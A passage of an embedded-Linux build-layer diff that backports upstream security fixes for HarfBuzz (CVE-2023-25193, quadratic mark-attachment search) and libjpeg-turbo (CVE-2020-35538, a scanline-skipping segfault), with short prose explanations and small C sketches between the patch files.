++ void unsafe_to_concat_from_outbuffer (unsigned int start, unsigned int end)
++ { unsafe_to_break_from_outbuffer (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT); }
+
+
+ /* Internal methods */
+@@ -377,12 +388,7 @@ struct hb_buffer_t
+ set_cluster (hb_glyph_info_t &inf, unsigned int cluster, unsigned int mask = 0)
+ {
+ if (inf.cluster != cluster)
+- {
+- if (mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
+- inf.mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- else
+- inf.mask &= ~HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- }
++ inf.mask = (inf.mask & ~HB_GLYPH_FLAG_DEFINED) | (mask & HB_GLYPH_FLAG_DEFINED);
+ inf.cluster = cluster;
+ }
+
+@@ -398,13 +404,14 @@ struct hb_buffer_t
+ void
+ _unsafe_to_break_set_mask (hb_glyph_info_t *infos,
+ unsigned int start, unsigned int end,
+- unsigned int cluster)
++ unsigned int cluster,
++ hb_mask_t mask)
+ {
+ for (unsigned int i = start; i < end; i++)
+ if (cluster != infos[i].cluster)
+ {
+- scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK;
+- infos[i].mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
++ scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS;
++ infos[i].mask |= mask;
+ }
+ }
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index 579d178..a6ca456 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -369,7 +369,7 @@ struct hb_ot_apply_context_t :
+ may_skip (const hb_glyph_info_t &info) const
+ { return matcher.may_skip (c, info); }
+
+- bool next ()
++ bool next (unsigned *unsafe_to = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx + num_items < end)
+@@ -392,11 +392,17 @@ struct hb_ot_apply_context_t :
+ }
+
+ if (skip == matcher_t::SKIP_NO)
++ {
++ if (unsafe_to)
++ *unsafe_to = idx + 1;
+ return false;
++ }
+ }
++ if (unsafe_to)
++ *unsafe_to = end;
+ return false;
+ }
+- bool prev ()
++ bool prev (unsigned *unsafe_from = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx > num_items - 1)
+@@ -419,8 +425,14 @@ struct hb_ot_apply_context_t :
+ }
+
+ if (skip == matcher_t::SKIP_NO)
++ {
++ if (unsafe_from)
++ *unsafe_from = hb_max (1u, idx) - 1u;
+ return false;
++ }
+ }
++ if (unsafe_from)
++ *unsafe_from = 0;
+ return false;
+ }
+
+@@ -834,7 +846,12 @@ static inline bool match_input (hb_ot_apply_context_t *c,
+ match_positions[0] = buffer->idx;
+ for (unsigned int i = 1; i < count; i++)
+ {
+- if (!skippy_iter.next ()) return_trace (false);
++ unsigned unsafe_to;
++ if (!skippy_iter.next (&unsafe_to))
++ {
++ c->buffer->unsafe_to_concat (c->buffer->idx, unsafe_to);
++ return_trace (false);
++ }
+
+ match_positions[i] = skippy_iter.idx;
+
+@@ -1022,8 +1039,14 @@ static inline bool match_backtrack (hb_ot_apply_context_t *c,
+ skippy_iter.set_match_func (match_func, match_data, backtrack);
+
+ for (unsigned int i = 0; i < count; i++)
+- if (!skippy_iter.prev ())
++ {
++ unsigned unsafe_from;
++ if (!skippy_iter.prev (&unsafe_from))
++ {
++ c->buffer->unsafe_to_concat_from_outbuffer (unsafe_from, c->buffer->idx);
+ return_trace (false);
++ }
++ }
+
+ *match_start = skippy_iter.idx;
+
+@@ -1045,8 +1068,14 @@ static inline bool match_lookahead (hb_ot_apply_context_t *c,
+ skippy_iter.set_match_func (match_func, match_data, lookahead);
+
+ for (unsigned int i = 0; i < count; i++)
+- if (!skippy_iter.next ())
++ {
++ unsigned unsafe_to;
++ if (!skippy_iter.next (&unsafe_to))
++ {
++ c->buffer->unsafe_to_concat (c->buffer->idx + offset, unsafe_to);
+ return_trace (false);
++ }
++ }
+
+ *end_index = skippy_iter.idx + 1;
+
+diff --git a/src/hb-ot-shape.cc b/src/hb-ot-shape.cc
+index 5d9a70c..5d10b30 100644
+--- a/src/hb-ot-shape.cc
++++ b/src/hb-ot-shape.cc
+@@ -1008,7 +1008,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
+ /* Propagate cluster-level glyph flags to be the same on all cluster glyphs.
+ * Simplifies using them. */
+
+- if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK))
++ if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS))
+ return;
+
+ hb_glyph_info_t *info = buffer->info;
+@@ -1017,11 +1017,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
+ {
+ unsigned int mask = 0;
+ for (unsigned int i = start; i < end; i++)
+- if (info[i].mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
+- {
+- mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- break;
+- }
++ mask |= info[i].mask & HB_GLYPH_FLAG_DEFINED;
+ if (mask)
+ for (unsigned int i = start; i < end; i++)
+ info[i].mask |= mask;
+--
+2.25.1
+
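The UNSAFE_TO_CONCAT documentation added above describes an iterate-back-and-retry strategy: walk back from the line-break position to a cluster start that is clear of the flag, re-shape from there, and verify the result. A minimal C sketch of the first step, using the public HarfBuzz buffer API, could look like the following; the helper name find_concat_start and the break_cluster parameter are illustrative assumptions, not part of the patch.

    #include <hb.h>

    /* Sketch only: walk back from a caller-chosen break cluster to the
     * nearest cluster start that is not flagged unsafe-to-concat.  The
     * buffer is assumed to be already shaped and in logical cluster
     * order; break_cluster is a hypothetical input value. */
    static unsigned int
    find_concat_start (hb_buffer_t *buf, unsigned int break_cluster)
    {
      unsigned int len;
      hb_glyph_info_t *info = hb_buffer_get_glyph_infos (buf, &len);

      for (unsigned int i = len; i > 0; i--)
      {
        const hb_glyph_info_t *g = &info[i - 1];
        if (g->cluster >= break_cluster)
          continue;   /* still at or past the break point */
        if (!(hb_glyph_info_get_glyph_flags (g) & HB_GLYPH_FLAG_UNSAFE_TO_CONCAT))
          return g->cluster;   /* safe point to start re-shaping from */
      }
      return 0;   /* fall back to the start of the paragraph */
    }

The caller would then shape from the returned cluster to the end of the line and check that the new run is itself clear of the flag at its start, retrying from an earlier position otherwise, exactly as the comment block describes.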
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch
new file mode 100644
index 0000000000..4994e0ef68
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch
@@ -0,0 +1,135 @@
+From b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Mon, 6 Feb 2023 13:08:52 -0700
+Subject: [PATCH] [gsubgpos] Refactor skippy_iter.match()
+
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324]
+Comment1: To backport the fix for CVE-2023-25193, add definitions for MATCH, NOT_MATCH and SKIP.
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/hb-ot-layout-gsubgpos.hh | 94 +++++++++++++++++++++---------------
+ 1 file changed, 54 insertions(+), 40 deletions(-)
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index a6ca456..5a7e564 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -369,33 +369,52 @@ struct hb_ot_apply_context_t :
+ may_skip (const hb_glyph_info_t &info) const
+ { return matcher.may_skip (c, info); }
+
++ enum match_t {
++ MATCH,
++ NOT_MATCH,
++ SKIP
++ };
++
++ match_t match (hb_glyph_info_t &info)
++ {
++ matcher_t::may_skip_t skip = matcher.may_skip (c, info);
++ if (unlikely (skip == matcher_t::SKIP_YES))
++ return SKIP;
++
++ matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
++ if (match == matcher_t::MATCH_YES ||
++ (match == matcher_t::MATCH_MAYBE &&
++ skip == matcher_t::SKIP_NO))
++ return MATCH;
++
++ if (skip == matcher_t::SKIP_NO)
++ return NOT_MATCH;
++
++ return SKIP;
++ }
++
+ bool next (unsigned *unsafe_to = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx + num_items < end)
+ {
+ idx++;
+- const hb_glyph_info_t &info = c->buffer->info[idx];
+-
+- matcher_t::may_skip_t skip = matcher.may_skip (c, info);
+- if (unlikely (skip == matcher_t::SKIP_YES))
+- continue;
+-
+- matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
+- if (match == matcher_t::MATCH_YES ||
+- (match == matcher_t::MATCH_MAYBE &&
+- skip == matcher_t::SKIP_NO))
+- {
+- num_items--;
+- if (match_glyph_data) match_glyph_data++;
+- return true;
+- }
+-
+- if (skip == matcher_t::SKIP_NO)
++ switch (match (c->buffer->info[idx]))
+ {
+- if (unsafe_to)
+- *unsafe_to = idx + 1;
+- return false;
++ case MATCH:
++ {
++ num_items--;
++ if (match_glyph_data) match_glyph_data++;
++ return true;
++ }
++ case NOT_MATCH:
++ {
++ if (unsafe_to)
++ *unsafe_to = idx + 1;
++ return false;
++ }
++ case SKIP:
++ continue;
+ }
+ }
+ if (unsafe_to)
+@@ -408,27 +427,22 @@ struct hb_ot_apply_context_t :
+ while (idx > num_items - 1)
+ {
+ idx--;
+- const hb_glyph_info_t &info = c->buffer->out_info[idx];
+-
+- matcher_t::may_skip_t skip = matcher.may_skip (c, info);
+- if (unlikely (skip == matcher_t::SKIP_YES))
+- continue;
+-
+- matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
+- if (match == matcher_t::MATCH_YES ||
+- (match == matcher_t::MATCH_MAYBE &&
+- skip == matcher_t::SKIP_NO))
++ switch (match (c->buffer->out_info[idx]))
+ {
+- num_items--;
+- if (match_glyph_data) match_glyph_data++;
+- return true;
+- }
+-
+- if (skip == matcher_t::SKIP_NO)
+- {
+- if (unsafe_from)
+- *unsafe_from = hb_max (1u, idx) - 1u;
+- return false;
++ case MATCH:
++ {
++ num_items--;
++ if (match_glyph_data) match_glyph_data++;
++ return true;
++ }
++ case NOT_MATCH:
++ {
++ if (unsafe_from)
++ *unsafe_from = hb_max (1u, idx) - 1u;
++ return false;
++ }
++ case SKIP:
++ continue;
+ }
+ }
+ if (unsafe_from)
+--
+2.25.1
+
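The refactor above folds the duplicated skip/match logic of next() and prev() into a single three-way match() helper. A generic C sketch of that control-flow pattern (made-up names, not the real HarfBuzz types) is:

    typedef enum { MATCH, NOT_MATCH, SKIP } match_t;

    /* Illustrative only: one classifier and one switch shared by the
     * forward and backward iterators, instead of two copies of the
     * same skip/match cascade. */
    static int
    advance (const int *items, unsigned int len, unsigned int *idx,
             match_t (*classify) (int item))
    {
      while (*idx + 1 < len)
      {
        (*idx)++;
        switch (classify (items[*idx]))
        {
          case MATCH:     return 1;   /* found the next relevant item   */
          case NOT_MATCH: return 0;   /* hard stop; caller records *idx */
          case SKIP:      continue;   /* ignorable item, keep scanning  */
        }
      }
      return 0;   /* ran out of items */
    }

Keeping the classification in one place is what lets the follow-up CVE fix call match() directly from the mark-attachment code without another copy of the loop body.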
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch
new file mode 100644
index 0000000000..e4ac13dbad
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch
@@ -0,0 +1,179 @@
+From 9c8e972dbecda93546038d24444d8216397d75a3 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Mon, 6 Feb 2023 14:51:25 -0700
+Subject: [PATCH] [GPOS] Avoid O(n^2) behavior in mark-attachment
+
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/8708b9e081192786c027bb7f5f23d76dbe5c19e8]
+Comment1: The original patch [https://github.com/harfbuzz/harfbuzz/commit/85be877925ddbf34f74a1229f3ca1716bb6170dc] caused a regression and was reverted. This patch completes the fix.
+Comment2: The patch contained the files MarkBasePosFormat1.hh and MarkLigPosFormat1.hh, which were moved out of hb-ot-layout-gpos-table.hh as per https://github.com/harfbuzz/harfbuzz/commit/197d9a5c994eb41c8c89b7b958b26b1eacfeeb00
+CVE: CVE-2023-25193
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ src/hb-ot-layout-gpos-table.hh | 103 +++++++++++++++++++++++----------
+ src/hb-ot-layout-gsubgpos.hh | 5 +-
+ 2 files changed, 78 insertions(+), 30 deletions(-)
+
+diff --git a/src/hb-ot-layout-gpos-table.hh b/src/hb-ot-layout-gpos-table.hh
+index 024312d..db5f9ae 100644
+--- a/src/hb-ot-layout-gpos-table.hh
++++ b/src/hb-ot-layout-gpos-table.hh
+@@ -1458,6 +1458,25 @@ struct MarkBasePosFormat1
+
+ const Coverage &get_coverage () const { return this+markCoverage; }
+
++ static inline bool accept (hb_buffer_t *buffer, unsigned idx)
++ {
++ /* We only want to attach to the first of a MultipleSubst sequence.
++ * https://github.com/harfbuzz/harfbuzz/issues/740
++ * Reject others...
++ * ...but stop if we find a mark in the MultipleSubst sequence:
++ * https://github.com/harfbuzz/harfbuzz/issues/1020 */
++ return !_hb_glyph_info_multiplied (&buffer->info[idx]) ||
++ 0 == _hb_glyph_info_get_lig_comp (&buffer->info[idx]) ||
++ (idx == 0 ||
++ _hb_glyph_info_is_mark (&buffer->info[idx - 1]) ||
++ !_hb_glyph_info_multiplied (&buffer->info[idx - 1]) ||
++ _hb_glyph_info_get_lig_id (&buffer->info[idx]) !=
++ _hb_glyph_info_get_lig_id (&buffer->info[idx - 1]) ||
++ _hb_glyph_info_get_lig_comp (&buffer->info[idx]) !=
++ _hb_glyph_info_get_lig_comp (&buffer->info[idx - 1]) + 1
++ );
++ }
++
+ bool apply (hb_ot_apply_context_t *c) const
+ {
+ TRACE_APPLY (this);
+@@ -1465,37 +1484,46 @@ struct MarkBasePosFormat1
+ unsigned int mark_index = (this+markCoverage).get_coverage (buffer->cur().codepoint);
+ if (likely (mark_index == NOT_COVERED)) return_trace (false);
+
+- /* Now we search backwards for a non-mark glyph */
++ /* Now we search backwards for a non-mark glyph.
++ * We don't use skippy_iter.prev() to avoid O(n^2) behavior. */
++
+ hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
+- skippy_iter.reset (buffer->idx, 1);
+ skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
+- do {
+- if (!skippy_iter.prev ()) return_trace (false);
+- /* We only want to attach to the first of a MultipleSubst sequence.
+- * https://github.com/harfbuzz/harfbuzz/issues/740
+- * Reject others...
+- * ...but stop if we find a mark in the MultipleSubst sequence:
+- * https://github.com/harfbuzz/harfbuzz/issues/1020 */
+- if (!_hb_glyph_info_multiplied (&buffer->info[skippy_iter.idx]) ||
+- 0 == _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) ||
+- (skippy_iter.idx == 0 ||
+- _hb_glyph_info_is_mark (&buffer->info[skippy_iter.idx - 1]) ||
+- _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx]) !=
+- _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx - 1]) ||
+- _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) !=
+- _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx - 1]) + 1
+- ))
+- break;
+- skippy_iter.reject ();
+- } while (true);
++ unsigned j;
++ for (j = buffer->idx; j > c->last_base_until; j--)
++ {
++ auto match = skippy_iter.match (buffer->info[j - 1]);
++ if (match == skippy_iter.MATCH)
++ {
++ if (!accept (buffer, j - 1))
++ match = skippy_iter.SKIP;
++ }
++ if (match == skippy_iter.MATCH)
++ {
++ c->last_base = (signed) j - 1;
++ break;
++ }
++ }
++ c->last_base_until = buffer->idx;
++ if (c->last_base == -1)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
++ return_trace (false);
++ }
++
++ unsigned idx = (unsigned) c->last_base;
+
+ /* Checking that matched glyph is actually a base glyph by GDEF is too strong; disabled */
+- //if (!_hb_glyph_info_is_base_glyph (&buffer->info[skippy_iter.idx])) { return_trace (false); }
++ //if (!_hb_glyph_info_is_base_glyph (&buffer->info[idx])) { return_trace (false); }
+
+- unsigned int base_index = (this+baseCoverage).get_coverage (buffer->info[skippy_iter.idx].codepoint);
+- if (base_index == NOT_COVERED) return_trace (false);
++ unsigned int base_index = (this+baseCoverage).get_coverage (buffer->info[idx].codepoint);
++ if (base_index == NOT_COVERED)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (idx, buffer->idx + 1);
++ return_trace (false);
++ }
+
+- return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, skippy_iter.idx));
++ return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, idx));
+ }
+
+ bool subset (hb_subset_context_t *c) const
+@@ -1587,15 +1615,32 @@ struct MarkLigPosFormat1
+ if (likely (mark_index == NOT_COVERED)) return_trace (false);
+
+ /* Now we search backwards for a non-mark glyph */
++
+ hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
+- skippy_iter.reset (buffer->idx, 1);
+ skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
+- if (!skippy_iter.prev ()) return_trace (false);
++
++ unsigned j;
++ for (j = buffer->idx; j > c->last_base_until; j--)
++ {
++ auto match = skippy_iter.match (buffer->info[j - 1]);
++ if (match == skippy_iter.MATCH)
++ {
++ c->last_base = (signed) j - 1;
++ break;
++ }
++ }
++ c->last_base_until = buffer->idx;
++ if (c->last_base == -1)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
++ return_trace (false);
++ }
++
++ j = (unsigned) c->last_base;
+
+ /* Checking that matched glyph is actually a ligature by GDEF is too strong; disabled */
+- //if (!_hb_glyph_info_is_ligature (&buffer->info[skippy_iter.idx])) { return_trace (false); }
++ //if (!_hb_glyph_info_is_ligature (&buffer->info[idx])) { return_trace (false); }
+
+- unsigned int j = skippy_iter.idx;
+ unsigned int lig_index = (this+ligatureCoverage).get_coverage (buffer->info[j].codepoint);
+ if (lig_index == NOT_COVERED) return_trace (false);
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index 5a7e564..437123c 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -503,6 +503,9 @@ struct hb_ot_apply_context_t :
+ uint32_t random_state;
+
+
++ signed last_base = -1; // GPOS uses
++ unsigned last_base_until = 0; // GPOS uses
++
+ hb_ot_apply_context_t (unsigned int table_index_,
+ hb_font_t *font_,
+ hb_buffer_t *buffer_) :
+@@ -536,7 +539,7 @@ struct hb_ot_apply_context_t :
+ iter_context.init (this, true);
+ }
+
+- void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; init_iters (); }
++ void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; last_base = -1; last_base_until = 0; init_iters (); }
+ void set_auto_zwj (bool auto_zwj_) { auto_zwj = auto_zwj_; init_iters (); }
+ void set_auto_zwnj (bool auto_zwnj_) { auto_zwnj = auto_zwnj_; init_iters (); }
+ void set_random (bool random_) { random = random_; }
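The heart of the O(n^2) fix above is the cached pair last_base / last_base_until: the backward search for a base glyph never rescans a prefix it has already covered. A stripped-down C sketch of that memoization (the array and names below are placeholders, not the real buffer structures):

    /* Sketch: is_base[] marks base (non-mark) glyphs, cur is the index
     * of the current mark.  last_base / last_base_until mirror the two
     * fields the patch adds to hb_ot_apply_context_t. */
    static int
    find_base (const unsigned char *is_base, unsigned int cur,
               int *last_base, unsigned int *last_base_until)
    {
      for (unsigned int j = cur; j > *last_base_until; j--)
        if (is_base[j - 1])
        {
          *last_base = (int) (j - 1);
          break;
        }
      *last_base_until = cur;   /* never search below this point again */
      return *last_base;        /* -1 means no base glyph was found    */
    }

Across a run of consecutive marks each call only examines the glyphs added since the previous call, so the total work over the whole buffer stays linear instead of quadratic.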
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb b/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
index ee08c12bee..0cfe01f1e5 100644
--- a/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
@@ -7,7 +7,10 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=e11f5c3149cdec4bb309babb020b32b9 \
file://src/hb-ucd.cc;beginline=1;endline=15;md5=29d4dcb6410429195df67efe3382d8bc"
-SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz"
+SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz \
+ file://CVE-2023-25193-pre0.patch \
+ file://CVE-2023-25193-pre1.patch \
+ file://CVE-2023-25193.patch"
SRC_URI[md5sum] = "2b3a4dfdb3e5e50055f941978944da9f"
SRC_URI[sha256sum] = "9413b8d96132d699687ef914ebb8c50440efc87b3f775d25856d7ec347c03c12"
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
new file mode 100644
index 0000000000..8a52ed01e9
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
@@ -0,0 +1,457 @@
+From 9120a247436e84c0b4eea828cb11e8f665fcde30 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Thu, 23 Jul 2020 21:24:38 -0500
+Subject: [PATCH] Fix jpeg_skip_scanlines() segfault w/merged upsamp
+
+The additional segfault mentioned in #244 was due to the fact that
+the merged upsamplers use a different private structure than the
+non-merged upsamplers. jpeg_skip_scanlines() was assuming the latter, so
+when merged upsampling was enabled, jpeg_skip_scanlines() clobbered one
+of the IDCT method pointers in the merged upsampler's private structure.
+
+For reasons unknown, the test image in #441 did not encounter this
+segfault (too small?), but it encountered an issue similar to the one
+fixed in 5bc43c7821df982f65aa1c738f67fbf7cba8bd69, whereby it was
+necessary to set up a dummy postprocessing function in
+read_and_discard_scanlines() when merged upsampling was enabled.
+Failing to do so caused either a segfault in merged_2v_upsample() (due
+to a NULL pointer being passed to jcopy_sample_rows()) or an error
+("Corrupt JPEG data: premature end of data segment"), depending on the
+number of scanlines skipped and whether the first scanline skipped was
+an odd- or even-numbered row.
+
+Fixes #441
+Fixes #244 (for real this time)
+
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9120a247436e84c0b4eea828cb11e8f665fcde30]
+CVE: CVE-2020-35538
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ChangeLog.md | 7 +++++
+ jdapistd.c | 72 ++++++++++++++++++++++++++++++++++++++++++++++------
+ jdmerge.c | 46 +++++++--------------------------
+ jdmerge.h | 47 ++++++++++++++++++++++++++++++++++
+ jdmrg565.c | 10 ++++----
+ jdmrgext.c | 6 ++---
+ 6 files changed, 135 insertions(+), 53 deletions(-)
+ create mode 100644 jdmerge.h
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 2ebfe71..19d18fa 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -54,6 +54,13 @@ a 16-bit binary PGM file into an RGB image buffer.
+ generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
+ file into an extended RGB image buffer.
+
++2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
++in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
++images using the merged (non-fancy) upsampling algorithms (that is, when
++setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a similar fix,
++but it did not cover all cases.
++
++
+ 2.0.3
+ =====
+
+diff --git a/jdapistd.c b/jdapistd.c
+index 2c808fa..91da642 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2010, 2015-2018, D. R. Commander.
++ * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
+ * Copyright (C) 2015, Google, Inc.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+@@ -21,6 +21,8 @@
+ #include "jinclude.h"
+ #include "jdmainct.h"
+ #include "jdcoefct.h"
++#include "jdmaster.h"
++#include "jdmerge.h"
+ #include "jdsample.h"
+ #include "jmemsys.h"
+
+@@ -304,6 +306,16 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ }
+
+
++/* Dummy postprocessing function used by jpeg_skip_scanlines() */
++LOCAL(void)
++noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
++ JDIMENSION *in_row_group_ctr,
++ JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
++ JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
++{
++}
++
++
+ /*
+ * In some cases, it is best to call jpeg_read_scanlines() and discard the
+ * output, rather than skipping the scanlines, because this allows us to
+@@ -316,11 +328,17 @@ LOCAL(void)
+ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+ JDIMENSION n;
++ my_master_ptr master = (my_master_ptr)cinfo->master;
+ void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION input_row, JSAMPARRAY output_buf,
+ int num_rows) = NULL;
+ void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ JSAMPARRAY output_buf, int num_rows) = NULL;
++ void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
++ JDIMENSION *in_row_group_ctr,
++ JDIMENSION in_row_groups_avail,
++ JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
++ JDIMENSION out_rows_avail) = NULL;
+
+ if (cinfo->cconvert && cinfo->cconvert->color_convert) {
+ color_convert = cinfo->cconvert->color_convert;
+@@ -332,6 +350,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->cquantize->color_quantize = noop_quantize;
+ }
+
++ if (master->using_merged_upsample && cinfo->post &&
++ cinfo->post->post_process_data) {
++ post_process_data = cinfo->post->post_process_data;
++ cinfo->post->post_process_data = noop_post_process;
++ }
++
+ for (n = 0; n < num_lines; n++)
+ jpeg_read_scanlines(cinfo, NULL, 1);
+
+@@ -340,6 +364,9 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+
+ if (color_quantize)
+ cinfo->cquantize->color_quantize = color_quantize;
++
++ if (post_process_data)
++ cinfo->post->post_process_data = post_process_data;
+ }
+
+
+@@ -382,7 +409,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+ my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
+ my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_master_ptr master = (my_master_ptr)cinfo->master;
+ JDIMENSION i, x;
+ int y;
+ JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
+@@ -445,8 +472,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+ main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
+- upsample->next_row_out = cinfo->max_v_samp_factor;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample =
++ (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->spare_full = FALSE;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->next_row_out = cinfo->max_v_samp_factor;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+ }
+
+ /* Skipping is much simpler when context rows are not required. */
+@@ -458,8 +493,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->output_scanline += lines_left_in_iMCU_row;
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+- upsample->next_row_out = cinfo->max_v_samp_factor;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample =
++ (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->spare_full = FALSE;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->next_row_out = cinfo->max_v_samp_factor;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+ }
+ }
+
+@@ -494,7 +537,14 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
